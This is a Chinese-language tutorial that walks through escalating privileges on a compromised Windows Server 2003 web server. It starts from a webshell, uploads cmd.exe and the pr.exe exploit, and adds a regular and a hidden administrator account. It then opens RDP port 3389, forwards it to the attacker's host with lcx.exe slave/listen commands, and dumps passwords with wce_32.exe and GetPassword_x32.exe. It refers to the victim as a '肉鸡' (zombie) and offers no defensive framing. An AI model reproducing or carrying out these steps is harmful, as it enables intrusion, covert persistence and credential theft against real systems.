提权攻击:
通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期从其他账户访问敏感信息,或甚至获得对某个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问权限时,我们将其行为称之为权限提升攻击。
提权方式:
1 . 操作系统漏洞提权
2 . 第三方服务提权
提权方式:操作系统漏洞提权
根据没有修补的补丁号码,到网上找利用程序,进行利用 。
1 . 访问目标网站
2 . 拿到webshell:通过文件上传,SQL注入,代码执行等等
3 . 上传自己的cmd.exe(因为默认一般不让调用系统的cmd.exe)
4 . 查看服务器信息(网络信息 , 账号信息 , systeminfo系统详细信息 等等)
5 . 利用提权补丁对比工具,查看可以利用的poc(漏洞测试代码程序)
6 . 上传可用的提权程序进行提权
示例:
进行提权添加账号 , 开启3389端口 ,进行端口转发,最后进行远程登录
1 . 访问目标网站。
2 . 获取webshell
3 . 执行cmd命令, 但是默认情况下拒绝访问 , 所有需要上传自己的cmd.exe
4 . 第三步上传完成后 , 查看服务器信息
a. 查看网络信息:ipconfig
b . 查看系统信息:systeminfo
5 . 利用提权补丁对比工具,查看可以利用的poc(漏洞利用代码程序)
复制上一步systeminfo得到的信息到对比工具上
6 . 上传其中一种提权poc , 上传pr.exe
7 . 查看并测试默认权限是什么, 可以干什么
8 . 利用pr.exe 开始提权, 注意后面执行的命令使用双引号包裹
9 . 利用pr.exe 提权成功 , 添加用户 net user tys 123456 /add
也可以添加隐藏用户:net user tys1$ 123456 /add ,查看隐藏用户可以输入net user tys1$
10 . 利用pr.exe 提权成功 ,把用户添加到管理员组 net localgroup administrators tys /add
11 . 查看当前系统开启端口情况 netstat -anp tcp
12 . 上传一个开3389端口的exp ,进行开启
13. 此时虽然端口已经打开,账号也已经 创建完成 , 但是不能直接远程登录,因为我们的物理机跟web服务器是不能直接通信的,所以要进行端口数据转发
端口转发, 网络拓扑解析 , 现在要实现 从2003 server 端口3389传输的数据,使得能在hack web server 上能进行监听
a .在2003 server 中上传端口转发程序: lcx.exe
b. 在肉鸡上,也就是server 2003 上运行命令:
lcx.exe -slave 192.168.3.7(hack web ip) 1111(hack web prot) 10.10.10.100(肉鸡IP) 3389(肉鸡端口)
代码解读 : 当有人连接1111端口时,把数据转移到3389端口 . 肉鸡和hack web 之间利用1111端口打通了, hack web 的3389 和 肉鸡的3389 端口
c . 这里先利用本地设备, 也就是物理机当做 hack web 设备 进行端口数据转发,
双击cmd.bat运行lcx程序 ,在dos界面输入: lcx -listen 1111本机端口) 3389(肉鸡端口)
代码解读 : 监听1111 , 3389
d . 在另外一台设备上开启远程桌面连接 , 输入监听主机的IP地址进行连接, 输入server 2003 的账号密码进行登录肉鸡web server , 登录成功
e. 读取原有用户密码: 用wce_32.exe
f. 读取原有用户密码: 用GetPassword_x32.exe
|